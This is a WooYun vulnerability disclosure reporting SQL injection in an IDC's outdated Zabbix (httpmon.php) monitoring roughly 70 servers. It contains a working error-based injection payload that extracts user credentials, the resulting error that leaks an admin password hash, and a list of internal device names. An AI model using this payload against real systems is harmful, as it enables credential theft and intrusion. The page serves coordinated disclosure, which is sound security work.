当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0182592

漏洞标题:某IDC zabbix版本过低存在SQL注入可威胁70台服务器包括4399/37wan等企业

相关厂商:cncert国家互联网应急中心

漏洞作者: cwkiller

提交时间:2016-03-09 21:30

修复时间:2016-04-25 19:44

公开时间:2016-04-25 19:44

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-09: 细节已通知厂商并且等待厂商处理中
2016-03-11: 厂商已经确认,细节仅向厂商公开
2016-03-21: 细节向核心白帽子及相关领域专家公开
2016-03-31: 细节向普通白帽子公开
2016-04-10: 细节向实习白帽子公开
2016-04-25: 细节向公众公开

简要描述:

rt

详细说明:

**.**.**.**/zabbix 用guest登陆
**.**.**.**/zabbix/httpmon.php?applications=2此处存在注入
构造注入语句

and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


爆出admin的md5值

Error in query [INSERT INTO profiles (profileid, userid, idx, value_id, type) VALUES (1226, 2, 'web.httpmon.applications', 2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a), 1)] [Duplicate entry 'Admin~c430613dfdaa9b2f6dae5027313bd58f~~1' for key 1]


得到md5 c430613dfdaa9b2f6dae5027313bd58f
但是解密不了。。。。
但是看了一下控制了70台服务器,危害还是很大的所以提交了

上望机房_5/1_S5328_1	-	-	-	1
上望机房_S9312_IDC_A - - - 1
兆维BGP_**.**.**.** - - - 1
北京万兆A - - - 1
北京万兆B - - - 1
墨麟-电信 - - - 1
安阳机房_3/7A-S3100-1G - - - 1
安阳机房_5/2A-S3100-1G - - - 1
安阳机房_5/6A-S5328-10G - - - 1
安阳机房_5/10A-S5024-1G - - - 1
无锡国际s5328 - - - 1
晨路金华-**.**.**.** - - - 1
综合楼37玩 - - - 1
9-2-fanghuoqiang-**.**.**.** - - - 1
9-2-fanghuoqiang-**.**.**.** - - - 1
9-2-fanghuoqiang-**.**.**.** - - - 1
9-2-fanghuoqiang-**.**.**.** - - - 1
9-2-fanghuoqiang-**.**.**.** - - - 1
9-2-fanghuoqiang-**.**.**.** - - - 1
9-2-fanghuoqiang-**.**.**.** - - - 1
9-2-fanghuoqiang-**.**.**.** - - - 1
9-2-fanghuoqiang-**.**.**.** - - - 1
27net-254.121 - - - 0
37wan-**.**.**.** - - - 1
4399北京电信_**.**.**.** 0 % 1 % 0.03 % -
BJ-BGP-**.**.**.** - - - 1
BJ-BGP-**.**.**.** - - - 1
cacti-238.58 - - - 1
dh7609-**.**.**.** - - - 1
dh9306-**.**.**.** - - - 1
jh-ucloud-78.1 - - - 1
jh-ucloud-92.1 - - - 1
jh-ucloud-207.1 - - - 1
jh-ucloud-bj-test1 - - - 1
jh-ucloud-ping - - - 1
jhcnc-6F-O1-s3560-ip2 - - - 1
jhdx-7f-1-16-S3560G - - - 1
jhdx-7f-2-1-S3750G - - - 1
jhdx-7f-4-1-A - - - 1
jhdx-7f-4-1-B - - - 1
jhdx-7f-4-10-S3560G - - - 1
jhdx-7f-9-2-S3560G - - - 1
jhdx-7f-9-2-S3700-A - - - 1
jhdx-7f-S9306-IDC-A - - - 1
jhdx-7f-S9306-IDC-B - - - 1
jhdx-7f-S9312-IDC-A - - - 1
jhdx-7f-S9312-IDC-B - - - 1
jhdx-8f-4-1-37WAN - - - 1
jhdx-8f-5-1 - - - 1
jhdx-8f-10-1-3750G - - - 1
jhdx-8f-10-1-W5328 - - - 1
jhdx-14-2-IP2 - - - 1
jhdx-14-2-IP2-A - - - 1
jhdx-14-2-IP2-B - - - 1
jhdx-14-2-IP2-C - - - 1
jhdx-old-7f-11-1-S5700-A - - - 1
jhdx-old-7f-12-1-S5700-A - - - 1
jhdx-old-7f-13-1-S5700-A - - - 1
jhdx-old-7f-14-1-S5700-A - - - 1
jhdx-old-7f-16-1-S5700-A - - - 1
jhdx-old-7f-17-3-S3560G-4G-B - - - 1
jhdx-old-7f-17-3-S3750-A - - - 1
jhdx-old-7f-17-3-S5728-M1 - - - 1
jhdx-old-7f-S9306-40G-trunk - - - 1
jh_cmcc_H05_5700_EI - - - 1
jh_cmcc_j9_5700AB - - - 1
mdycloud_bgp_S5328


漏洞证明:

QQ截图20160309153021.png


QQ截图20160309152820.png


QQ截图20160309152847.png

QQ截图20160309152854.png

修复方案:

版权声明:转载请注明来源 cwkiller@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2016-03-11 19:44

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无